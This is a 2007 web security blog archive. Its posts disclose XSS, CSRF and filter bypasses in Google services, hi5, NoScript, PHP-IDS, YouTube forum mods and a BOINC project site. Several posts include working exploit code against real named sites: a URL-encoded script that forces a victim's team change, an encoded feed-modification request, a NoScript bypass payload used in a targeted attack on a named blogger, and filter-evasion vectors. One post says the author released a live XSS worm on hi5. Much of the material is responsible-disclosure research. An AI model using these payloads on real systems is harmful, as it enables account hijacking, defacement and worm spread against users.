Sunday, December 30, 2007

Bypassing Content-Disposition: attachment for XSS on IE

Well first of all I want to congrats my friend kuza55 because of his talk "Unusual Web Bugs" at 24c3, was a success.

I watched it on the stream, and even do it dropped every 2 minutes, the audio was sort of constant, so I was able to hear it.

So, it was awesome, and he used the stuff that was investigated and discovered lately, so that was a cutting edge talk.

Anyway, I tried to make kuza receive a message for the Q&A, that wasn't able to arrive, when you say that the header Content-Disposition: attachment is a restriction that no one has been able to bypass, well it's bypassable, and I dunno why I didn't told you about this.. anyway..

Suppose that http://www.victim.com/downloads.php?file=999 is a downloader that sends the header: Content-Disposition: attachment, then you can make IE to display the content as "the best guess", by caching it first, like this:

<script src="http://www.victim.com/downloads.php?file=999"></script>
<iframe src="http://www.victim.com/downloads.php?file=999"></iframe>

The iframe will load the cached source, and it will show the best guess IE can make.

I haven't tested this on firefox, sorry, but at least it works on IE 6 and 7.

So, that's mostly all, just wanted to say that..

Greetz!!

Monday, December 24, 2007

Making a Social Network XSS Worm (hi5.com)

Well, the last couple of days I've been playing with hi5.

It's pretty cool, and I found a couple of XSS vulnerabilities.

I reported them to help@hi5.com, security@hi5.com, admin@hi5.com and all the e-mails I found on the domain hi5.com.

Well, they didn't responded.

So, there's a XSS Worm for hi5 on the wild.

The worm is on the following profile (if you visit it throught this domain you wont get infected, the problem lies if you visit it through www.hi5.com domain):

http://xssworm.hi5.com/

I'll alert you that the profile may be deleted by hi5 staff at any time.

I'll give an explanation on how this worm works as soon as it's controlled by the hi5 team, since it doesn't use XHR.. and some people asked me on the past if it is possible to do a worm without XHR.

To the hi5 team: there are a lot of vulnerabilities on your website, if you wish, I could help you with them, just respond the freaking e-mails.

cya!

UPDATE

I've finally been contacted by the hi5 team, we are working on solving the XSS & CSRF vulnerabilties.

Wednesday, November 21, 2007

CSK2 and CSS Applications

This week, I've sort of improoved the CSK of Gareth Heyes, with a few more event handlers, and interoperability with Opera (and menus!!).

This new version is over here:
http://www.sirdarckcat.net/csk2.html

Anyway, with the research I did, I also found the bast world of possibilities implied on CSS.

Starting from the CSK2, I've developed a game made in CSS with no javascript (anyway, you can only play once).. which currently works on all browsers, except from IExplorer.

I also used this knowledge gathered, to make my final project on the university (it was just making a website.. haha): http://da-vinci.awardspace.com/ this works just on firefox (don't tell my teacher, :P)

On some other news, thornmaker and I, where trying to proof that CSS + HTML is Turing Complete, anyway, since we dont have a way to make real loops (evendo we had some ideas about including bindings that include themselves until a condition is made, that could work as recurtion), it "appears" that CSS+HTML is NOT Turing Complete.. anyway, I'll continue investigating to be sure.

Greetz!!

Thursday, November 08, 2007

Inside History of hacking rsnake for fun and pagerank.

Well the research made for the exploit for the joke for rsnake is sort of interesting, so I'll try to explain what was needed (even do it was unsuccesfull).

This was made with the help of the research made by the members of sla.ckers like ascii, gareth heyes, rsnake, Jeremiah Grossman, thornmaker, Wisec, kuza55 and me.

It exploited a bug and a feature from ha.ckers.org:

And a feature from Firefox:

Some bugs from NoScript:
  • XBL Frame Injection to bypass NoScript IFrame protection.
  • setter/name NoScript anti XSS filter bypass.
(this bugs have been patched since version 1.1.7.8 of NoScript)

You can read the comments from Robert Hansen, and Giorgio Maone about this exploit at ha.ckers.org and hackademix.net (oh jeremiah grossman also talked about this here and some others in langs that I dont understand).

The only thing the exploit required was that rsnake had ha.ckers.org white-listed on NoScript, but it didn't succeed for that and some other secret reasons.

For targeting the exploit just for rsnake, and hiding it from other persons, we did 3 things.

First we checked if rsnake had ha.ckers.org/blog/wp-admin/post-new.php on his history via CSS History check without javascript.

If this was unsuccesfull because of the "SafeHistory" plugin, or any other reason, we checked if his IP had access to ha.ckers.org/blog/wp-admin/wp-admin.css stylesheet, if he had, we would try to exploit it.

For doing that we played with display:block/display:none properties of iframes, but in the case that rsnake had NoScript iframe protection enabled, then the exploit would be unsuccesfull, so we added a -moz-binding, for detecting NoScript presence, and replacing it with a frameset/frame.

With that, we just redirected rsnake to the payload, the problem was that NoScript detects reflected XSS attacks, so we needed to find a way to bypass it, and we did.. (http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;)

That in un-obfuscated code is:

eval(atob(window.name)).

atob=decode base64.

The reason this bug works was a mistery at the begining, but after Wisec re-constructed the as2 bytecode he saw that there where some variables appending to the url, and then after some more research this is the reason this guys found out (explained by kuza55):

the Flash file looked like this:

getURL("javascript:('XSS')", "_self", "GET");
stop();

That third parameter turned out to be the key (though we only found this by an absolute fluke), initially we just assumed that the third parameter was just saying it should be a GET request, but the third argument does more actually:

[www.adobe.com]

getURL(url [, window [, "variables"]])

[snip]

variables: A GET or POST method for sending variables. If there are no variables, omit this parameter. The GET method appends the variables to the end of the URL, and is used for small numbers of variables. The POST method sends the variables in a separate HTTP header and is used for sending long strings of variables.

Now, seeing as in AS2, all variables which are passed on the URL are imported into the global scope (like register_globals), we get it sent with the request. Now seeing as there was no semi-colon at the end of the first argument, we were able to abuse the fact that the ? is not only the thing separating the variables in the URL from the file, but it is also the javascript ternary operator.

So we simply used this to finish off a valid statement using the ternary operator, and then specified our XSS.

The window.name trick doesn't require a javascript doing window.name="payload".. it required just a frame named as we wanted.. (< iframe name="payload">) since NoScript strips any char matching [^a-z0-9_\-] with space in window.name, then we needed to encode the payload in base64 and remove all the "+" and "/" chars of it via whitespacing where they where shown.

So, we posted a comment with a link that may attract the attention of rsnake when moderating the comments, and we only needed to wait..

Then, we saw the anti-climax.. the comment was aprooved, and the payload wasnt triggered.. lol (hey spammers)

So we did another post, now with a link that appeared to be spam, and we did..
http://owaspnj.blogspot.com.

Any way, that comment wasnt aprooved, and the exploit in there (that was clearly more hidden than the ultimatehxr.googlepages.com) was not necessary.

So you can see the exploit here (it's commented :D):

http://www.sirdarckcat.net/blah2.html


if you want to know what's blah1.html, it's just how we where trying to detect the wp-admin.css.

The last thing is to explain the functionment of the payload.

1.- via XMLHttpRequest, it asked for /post-new.php source code.
2.- it created an iframe, and writted inside that iframe the source code with a.. "< base target="/wp-admin">"
3.- Then he submited the first form modifying the title, content, and tags fields, and clicking on publish (yeah we wanted the payload to had tags).
4.- And that was all, no RegEx.match for finding nonces, and nothing :P..

You can see the content of the post as it would appear if the exploit suceeded here:
http://rsnakex.wordpress.com/

Greetz!!

Saturday, October 13, 2007

Vulns of Google that where, and are not?

Well, this are the bugs at Google services that even do are fixed now, where around for a while.

First I have to say that the Google Security Team (yeah, that sounds like a hacking team xD), responded very well and quickly many times the same day, or 1 day after the report.

In an exchange of 35 mails (give or take), between each other, the following vulnerabilities where reported and fixed:

1.- XSS at GWT/MDP < http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E >

The response to this mail had the following signature:

Erik, Google Security Team
NOTE: This message was sent by a human.

:P r0cks
the vulnerability was reported on July 27, and fixed on August 4.

2.- A CSRF+XSS vuln in Google Pages + Google Apps For Your Domain

1.- You need to make your victim log in into the attacker GoogleAppsForYourDomain (google pages) account.. to do that is not difficult.. you can make a simple script that submits a form the same way:
https://www.google.com/a/ DOMAIN /ServiceLogin
it's important to take into consideration, that the attacker will reveal the user and password (of his googleappsforyourdomain account) to the victim.

2.- Once your victim is logged in, you make your victim to go to a "preview" cached version of a page that has a script.. and that's all.

It sounds difficult, but it wasn't, the preview page could be reached with just 1 token that was revealed at signing up proccess.

Well, that one was reported on August 19 and fixed on September 4

Then, the same day, there was another one, now in the edition page.
3.- Another XSS+CSRF vuln in Google Pages + Google Apps For Your Domain.

In an unpublished page, add this code:
iframe src="javascript:alert(123);">< /iframe >

and then when you leave the site the code will be executed, and every time someone enters to that page..(or leaves) this could also be used to attack GoogleApps pages, when there is more than 1 admin.

Well, this one had a PoC, and was pretty cool :P, but it had some usernames and passwords, so if I release it, then the PoC wont last a second.. ¬¬

4.- Data Spoofing at Google Analytics.
Well this one is still "live", so I wont get on many details.
An attacker can make someone using Google Analytics beleive, that they came from your site (referrer), even if they haven't, they can make them change the URL of the report of activities on certain user, and a lot of cool stuff that are based on this.

5.- Google Mashups, XSS and Design Flaw.
lol, I've already reported this one here.. the XSS doesn't exist anymore, and the Design Flaw wont be fixed.

6.- Youtube redirection?
Is not a vulnerability on youtube, but in some plugins, that abuse it.. here it is.

7.- More cool stuff still about to be patched.
yeah, well, there are a few other vulns that will probably get fixed in the following weeks :P

For the guys that have asked me on the past, "why do you do this for free"? well, thats because.. it's like a hobby, I use google a lot, and I am curious.. I have a very cool Google T-Shirt, and well, maybe in the future I can make my name appear over here..

Greetz!!

Sunday, September 30, 2007

Universal youtube mods XSS explained in 7 steps

Well, I want to explain first, this was not my idea, someone at irc.irchighway.net/#slackers discussed about this a while ago, but he wasn't able to find a redirection URL at youtube.

A couple of days ago I found such URL, and now I can't remember who was he, please if you read this, send me an e-mail to modify this post for the credits.

[[ UPDATE ]] kuza55 found out that Kyran was the one to come with the idea [[ /UPDATE ]]

Well, discusing this with the guys at w4ck1ng it appears that the vulnerability is rather complex to understand.

  1. First, we know that if we can embed a flash movie into a site, we can make XSS attacks, by means of getURL("javascript:code_here");
  2. Second, we know that we cant embed any arbitrary movie into any forum (at least not by default).
  3. Third, we know there are thousands of forums that have Youtube mods instaled, so their users can link to movies, and watch them without leaving the site.
  4. Fourth, the mods for youtube (at least the ones I found) have no regular expressions for validating that the video linked is valid, and they do: http://www.youtube.com/v/{param_here} thinking, that in such way an attacker wont be able to change the domain.
  5. Fifth, Youtube doesn't have any visible redirection URL that forwards to an arbitrary site, so if you found a redirection page, you could do.. http://www.youtube.com/v/../redirection?page=http://your.swf.exploit/
  6. Sixth, the redirection page inside youtube is http://www.youtube.com/confirm_email?next=http://new.url/
  7. Seventh, using step 4, 5 and 6 the exploit is like this: [youtube=1,1]../confirm_email?next=http://exploit.com/swf[/youtube]
Well, I think that's all.. the easiest way of patching this vulnerability is simply adding a allowScriptAcces="never" in the object tag of your mod.. anyway, attackers will still be able to redirect to their movies, for stopping that you need to make a regular expression that matches the input with ^[a-zA-Z0-9_]{11}$
(like the phpBB mod does)

[EDIT]
List of SMF vulnerable mod's:

Not vulnerable:

Unsafe IPB youtube mod instalation:
[/EDIT]

Friday, September 28, 2007

Google Mashups Vulnerability

yay, I wanted to be part of this hell of a week (Google's Dark Week).

Here is the vulnerability I reported to google, and it appears to be a "design error" (and there is no fix, without breaking other things).

With this vulnerability you can "deface" any google-mashups project, creating your own XML-RPC to the GWT server, and change the contents of any feed.

The report I sent to Google is this:






Supose, you are the creator of http://gallery.googlemashups.com/
if you include a list, for a local feed, then any attacker from the world will be able to modify all the content in your website.

This is maybe a design error, and as I see it, it's pretty dificult to fix.

I've made a demonstration to http://gallery.googlemashups.com/
Enter to the website, and go to the last page, there you will see that the last item was modified.

to do so, you just need to execute the following code:


with(new XMLHttpRequest()){
open("POST","http://gallery.googlemashups.com/feeds/app/galleryApps",true);
setRequestHeader("Content-Type","application/atom+xml; charset=utf-8");
setRequestHeader("X-Gm-Validate","ASDFGHJKLÑPQWERRTYUIOPZXCVBNMUJHFDDDEFFDSSCFGGTFDQWERTYUIYTRREWWWQQ");
setRequestHeader("X-GData-Client","JavaScript-V1.0-Google Mashup Editor");
send(unescape("%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%55%54%46%2d%38%22%20%3f%3e%0d%0a%3c%61%74%6f%6d%3a%65%6e%74%72%79%20%78%6d%6c%6e%73%3a%67%6d%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%64%2f%32%30%30%37%22%20%67%3d%22%63%6f%6d%2e%67%6f%6f%67%6c%65%2e%67%77%74%2e%63%6f%72%65%2e%63%6c%69%65%6e%74%2e%4a%61%76%61%53%63%72%69%70%74%4f%62%6a%65%63%74%22%20%78%6d%6c%6e%73%3a%61%74%6f%6d%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%20%78%6d%6c%6e%73%3a%67%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%67%6d%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2d%6d%65%74%61%64%61%74%61%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%43%61%6c%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%43%61%6c%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%73%74%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%74%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%61%70%70%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%70%70%73%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%78%73%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%58%53%4c%2f%54%72%61%6e%73%66%6f%72%6d%22%20%78%6d%6c%6e%73%3a%78%68%74%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%78%68%74%6d%6c%22%20%78%6d%6c%6e%73%3a%6f%70%65%6e%53%65%61%72%63%68%3d%22%68%74%74%70%3a%2f%2f%61%39%2e%63%6f%6d%2f%2d%2f%73%70%65%63%2f%6f%70%65%6e%73%65%61%72%63%68%72%73%73%2f%31%2e%30%2f%22%20%78%6d%6c%6e%73%3a%6d%65%64%69%61%3d%22%68%74%74%70%3a%2f%2f%73%65%61%72%63%68%2e%79%61%68%6f%6f%2e%63%6f%6d%2f%6d%72%73%73%22%20%78%6d%6c%6e%73%3a%67%65%6f%72%73%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%65%6f%72%73%73%2e%6f%72%67%2f%67%65%6f%72%73%73%3d%67%65%6f%72%73%73%22%20%78%6d%6c%6e%73%3a%67%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6f%70%65%6e%67%69%73%2e%6e%65%74%2f%67%6d%6c%3d%67%6d%6c%22%20%78%6d%6c%6e%73%3a%65%78%69%66%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%68%6f%74%6f%73%2f%65%78%69%66%2f%32%30%30%37%3d%65%78%69%66%22%20%78%6d%6c%6e%73%3a%67%6d%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%73%2f%32%30%30%37%22%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%3e%0d%0a%3c%69%64%3e%68%74%74%70%3a%2f%2f%67%61%6c%6c%65%72%79%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%3c%2f%69%64%3e%0d%0a%3c%70%75%62%6c%69%73%68%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%70%75%62%6c%69%73%68%65%64%3e%0d%0a%3c%75%70%64%61%74%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%75%70%64%61%74%65%64%3e%0d%0a%3c%74%69%74%6c%65%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%63%6f%6e%74%65%6e%74%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%3c%2f%63%6f%6e%74%65%6e%74%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%73%65%6c%66%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%22%2f%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%65%64%69%74%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%2f%30%22%2f%3e%0d%0a%3c%67%64%3a%61%70%70%4c%69%6e%6b%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%61%70%70%4c%69%6e%6b%3e%0d%0a%3c%67%64%3a%69%6d%67%55%52%4c%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%69%6d%67%55%52%4c%3e%0d%0a%3c%67%6d%64%3a%61%75%74%68%6f%72%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%3c%2f%67%6d%64%3a%61%75%74%68%6f%72%3e%0d%0a%3c%2f%61%74%6f%6d%3a%65%6e%74%72%79%3e"));
onreadystatechange=function(){
if(readyState==4){
alert(responseText);
}
}
}


you can get the X-Gm-Validate token, by sniffing your connection, the modification of the feeds, doesnt require validation of any type.

Well, that's the first part..
with this information you can modify the content of any item on the feed, but that's not all.
the information passed are not validated at all! so by means of..
link=blah">XSS

I could do a persistent XSS attack, this could completely destroy the project, make a deface or anything.

If you need me to explain further please tell me.





Well, actually there's also another XSS vulnerability in some other services, anyway, they are on their way of fixing them.. so I won't disclose them here (yet).

Thursday, September 06, 2007

Allowing debug in a javascript library

Hi, some days ago I watched John Resig Tech Talk, about building a JavaScript library, where he pointed out some "good habits", when programming, and when doing js libraries, pretty interesting.

Any way, he mentioned that we shouldn't use try&catch because the coder "cant" debug his code, because we trap the error, and he is never able to see it.. so, I thought that an interesting way of letting the "error pass", but still have controll of the library is using setTimeout, to let the code run asynchronously.

The code I submitted to his blog, is:

setTimeout(function(){/*code here*/},0);

So, the error is reported to the user, and we dont loose the control of the code..

Some time after that I thought that, it could also be used for letting code runing in memory.. (but it's cancelled as soon as you leave the website).

Any way, as a programmer, I see this as a technique for running more than 1 process at one, as a security researcher, I see this as a technique for running XSS payloads in a more sigilous way.

Saturday, September 01, 2007

7 minutes to kill a monster.

Well, a response time of 1 week, is said to be good, Mozilla has 10 f***ing days, Google depending on the complexity of the vulnerability takes between 1 day to a few weeks to fix them, but Mario Heiderich, developer of the PHP-IDS, has an amazing 7 minutes time to pull a patch for a vuln.

A week ago, he talked me about a "call for hacking" to PHP-IDS, and I said it would be really difficult, because the last time, the filters where extremely enforced, so I started playing (before the call for hacking was published), and in an hour I found 3 vectors, and made a PoC, of 666 bytes (that's why it's a monster xD), 2 of them where based on Giorgio Maone window.name vector.

So, I asked Mario, if I have to wait until the call for hacking was published, but he pulled the patch immediatelly.

A few minutes later, I found another HTML vector ("style="anything), that was fixed too.

So he decided to interview me, as a price for winning an unstarted contest :P.

The vectors where:

  • open(name)
  • eval(name)
  • (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
I'm sure that Gareth Heyes, and Giorgio Maone will be the next to find some vectors :)

Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at elhacker.net, they showed a project, for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" of teams, for winning credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF, and XSS at the team search engine.

So, I made a simple exploit, that will change your team to.. BOINC Confederation.

The XSS vuln, is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all forms..

The exploit (for firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user of an important team.. you can make your team win, the list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php

Greetz!!

--EDIT--
The bug has been fixed :) is good to see that someone actually reads my blog xD

Monday, August 06, 2007

JavaScript is just evil (for you) [ Part I ]

This is the first of 3 parts of the document entitled: "JavaScript is just evil".

Here are the first 2 chapters.

1.- DoSing the browser


You wont learn anything new in this first chapter, is just a set of examples.

2.- Injecting code and tracing stack


Here we will see some attack vectors for chrome privilege escalation.



In them will demonstrate by several code examples, how JavaScript can be used for evil uses.

This started a while ago, when, while chatting with Giorgio Maone, and showing him an example that crashed Firefox (using intervals), he said as response.. "there's nothing we can do, javascript is just evil"..

The phrase "javascript is just evil" captivated me in such a way, that I started thinking in which ways javascript could be used for evil.

Now, I divided the document in 3 sections, and them divided into 5 chapters.

    JavaScript is just evil (for you).


  1. DoSing the browser

  2. Injecting code and tracing stack

  3. JavaScript is just evil (for your server).


  4. XSS Worms

  5. DOM Level XSS

  6. JavaScript is just evil (for your local files).


  7. Local Files Privileges and HTA's



I hope you like them!

Morfi! the Human readable+HTML+JavaScript file all in one..

Here I present a file that will appear different depending on which application you open it.
As plain text, it will describe how it works, as HTML, it will define XSS, and as JavaScript
it will pop up a simple alert(document.cookie+window.location); XSS PoC.

Opened as plain text (just reading the words in the code):

This HTML file is a PoC on how complex the HTML and JavaScript code can get and
here, with the use of style and changing the visibility to hidden on some non
style elements, we will hide and show some parts of js code and HTML, we will also make
Function and a javascript alert that shows a document cookie and the window location, a
script that takes as src the same file, and executes the code inside the script
and a HTML file that is also XML valid, and will define XSS.

Opened as JavaScript:

alert(document.cookie+window.location);

Opened as HTML in Firefox:

this, "the attack based on accessing and modifying a webpage in the context of other domain" is the function of XSS attacks.

It will also show an alert, produced by including itself as a javascript script.

http://www.sirdarckcat.net/morfi.html

This was submitted for The Month of Hacker Folklore at GNUCITIZEN.

Saturday, August 04, 2007

Google teachs security basics

It's rather simple.. and it deals with vulns at the "server level" (no sqli, rfi, xss, etc..) anyway..

http://code.google.com/edu/content/submissions/web_security/listing.html

Lectures

Coding Projects



It has 2 slide shows and 1 problem set.

Thanks to crack_x for showing me the code.google.com/edu site.

Discuss here: http://sla.ckers.org/forum/read.php?13,14409

Sunday, July 29, 2007

DoSing Firefox with Error Consoles

3 days ago, I found out that there was a way of Popping up the Firefox JavaScript Error Console, by doing:

<iframe src="javascript:"></iframe>

I was testing what could I do to exploit it, (like trying to execute some code in the chrome:// context), but I wasn't able..

This was 1 of my failed attacks.. to steal chrome context:

throw new function(){
this.toString=this.valueOf=function(){
alert(location);
return "<script>alert(location);</script>";
}
}


For the ones that doesn't know this, throw will "throw" an error exception.. :P

Any way, then while playing with the multiple consoles I had, I realized that if for example, you click "clear" on one console, all the consoles will clear the error messages.. so maybe, the memory allocated at the time of showing errors, won't be checked as well..

I made a PoC of a memory exhaustion exploit at firefox (It's a DoS exploit, You Have been Warned), which I talked about with Giorgio Maone, and it appears that this was just a Denial of Service attack (that I think depends on the amount of RAM the victim has, for example RSnake just suffered a temporal freezing of the browser, and after closing the error consoles, everything went back to normal), ma1 told me to file it anyway to bugzilla, (thing that I did today), but I don't know for sure if a memory exhaustion bug, will be considered a real bug at Mozilla.. anyway, NoScript users are already invulnerable to this attack (since yesterday, I think).

Friday, July 27, 2007

Temporal Cache Poisoning (IExplorer and Firefox) = Feature?

While making estigma's function EditHTML() (a WYSIWYG editor), I realized that the code modified, will stay on cache, until you close the browser, or exit the website and enter again.

At the time, I was too busy to check it deeply, and I guessed it has something to do with the removeNode function I was using.. Any way, yesterday I retook the investigation, and it appears that the only thing you need for modifying the cached version of a website, is to access:

javascript:document.write("content");document.close();

Using the javascript: URI, in the target webpage.

This was very interesting, because that meant, that you could modify the cached version of any webpage in a domain that you have access, so for example if a website has a XSS bug in any place of the website..

http://www.victim.com/this/website/is/vulnerable.php

It will be able to modify the www.victim.com/index cached version.

This will be done in a very simple way, I've uploaded a PoC, so you can test it in any website using..
<script src="//sirdarckcat.net/cache_poisoning.js"

This code, will open a window, to the current directory index, and 5 seconds later, it will modify the cached version of the webpage.

Once you enter that website, and hit refresh, the content won't change, because the cached version of the website is the one generated by the javascript code.

As I was investigating this, Mario Heiderich explained me that this type of attack, may be used for confusing siteoweners to obfuscate the real attack like reporting a minor vuln to draw attention while exploiting the grave flaw.

Any way, while talking about this with Giorgio Maone, this (apparently) is the browser's desired behavior (to save the javascript generated code in the cache), so this is not a bug, it's a feature!.

The impact has already been explained by Mario Heiderich, and another (possible attack), could be to make a fake deface to a website index, any way, I'm impressed that this is actually what the web browser wants.

Thursday, July 26, 2007

Playing with Google Wireless Transcoder

Last Week, I found Google Wireless Transcoder, and I started playing with it trying to find a XSS bug in the HTML "transcoder", and I shared it with Ronald, RSnake, and .mario.
What the Google Wireless Transcoder does, is pretty simple, it get's HTML code, and translate's it into XHTML mobile compilant code.
The way it works is a little mysterious (it's made in Java b.t.w.).. It could be something similar to HTML Purifier (this was pointed out by .mario), but I would say, that it works as a server-side browser, that generates valid XHTML code reconstructing the DOM.. (which in fact is not very difficult to do).. I think this because there are some errors very similar to other Java browsers, like jrex.. or jakarta (the GWT supports ftp:// gopher:// http:// between others..) for example:

This is an exception generated by this code:

http://jakarta.apache.org/commons/httpclient/xref/org/apache/commons/httpclient/HttpHost.html

So this makes me believe that they (at least) use HttpHost.java
They also use BASE64DecoderStream.java

Any way, there are some other errors like this one:

This is an exception generated by Firefox, because GWT returned invalid XHTML.. this is interesting, because it demonstrates that in some way, the GWT supports javascript URI.
(this website is googlr.com, that is a mirror of google.com, for avoiding the session generated at google.com).

We can also see that GWT, can be used as a "redirector", like:
http://www.google.com/gwt/n?u=http://www.vidoblog.net/ip/&_gwt_pg=orig

note the _gwt_pg

We can also temporarily host images, we just need to enter any website that contains images, (like google.com).
http://www.google.com/gwt/n?u=www.google.com
and the logo, will have an url simillar to:
http://www.google.com/gwt/i?i=01F8441E4_F9610322_4DB7F91D

Another interesing thing that RSnake pointed out is that, this "internal proxy's" are "logically
separated from their internal addresses." Any way, I found very interesting that:

http://www.google.com/gwt/n?u=gopher://local.sirdarckcat.net
http://www.google.com/gwt/n?u=gopher://unexistent

returns something different to:

http://www.google.com/gwt/n?u=gopher://127.0.0.1
http://www.google.com/gwt/n?u=gopher://localhost
http://www.google.com/gwt/n?u=gopher://localhostABCD

Even do local.sirdarckcat.net, and localhost (supposedly) point's to 127.0.0.1, but localhostABCD doesn't. why.. gopher://unexistent is different to gopher://localhostABCD ? maybe it's a way to avoid an attacker to contact 127.0.0.1..

We could try to enumerate the "alive" hosts with local.sirdarckcat.net:port#, but as far as I tested, all ports return's the same.

Something else that was discovered was that GWT parses data URIs.

http://www.google.com/gwt/n?u=data:text/html;base64,PGh0bWw%2BDQo8aGVhZD4NCjx0aXRsZT5IZWxsbyBXb3JsZDwvdGl0bGU%2BDQo8L2hlYWQ%2BDQo8Ym9keT4NCkczDQo8L2JvZHk%2BDQo8L2h0bWw%2B

pretty amazing it's the first web-proxy (I've seen) that actually parses them..

For ending, I think that GWT is a great tool, has a lot of features (some of them hidden to naive eyes). I think this should be investigated more deeply, (for example the impact of using GWT as a SEO technique, to use GWT pagerank as an inbound link to your site).

Greetz!!

Saturday, July 07, 2007

Passing Variables by Reference in JavaScript

Long time ago, when I was learning C, and I understood the use of pointers, I started thinking if there was a way to pass the JavaScript variables by reference.
I had a lot of ideas, but they didn't worked as spected.

For example, for global variables in a browser, I could use:

